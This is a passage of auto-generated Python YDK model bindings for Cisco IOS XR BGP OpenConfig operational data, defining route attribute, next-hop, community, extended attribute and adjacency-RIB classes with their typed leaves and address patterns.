class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "adj-rib-in-post"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost']['meta_info']
class AdjRibOutPost(_Entity_):
"""
Adjacency rib out\-bound post\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost, self).__init__()
self.yang_name = "adj-rib-out-post"
self.yang_parent_name = "open-config-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "adj-rib-out-post"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "adj-rib-out-post"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
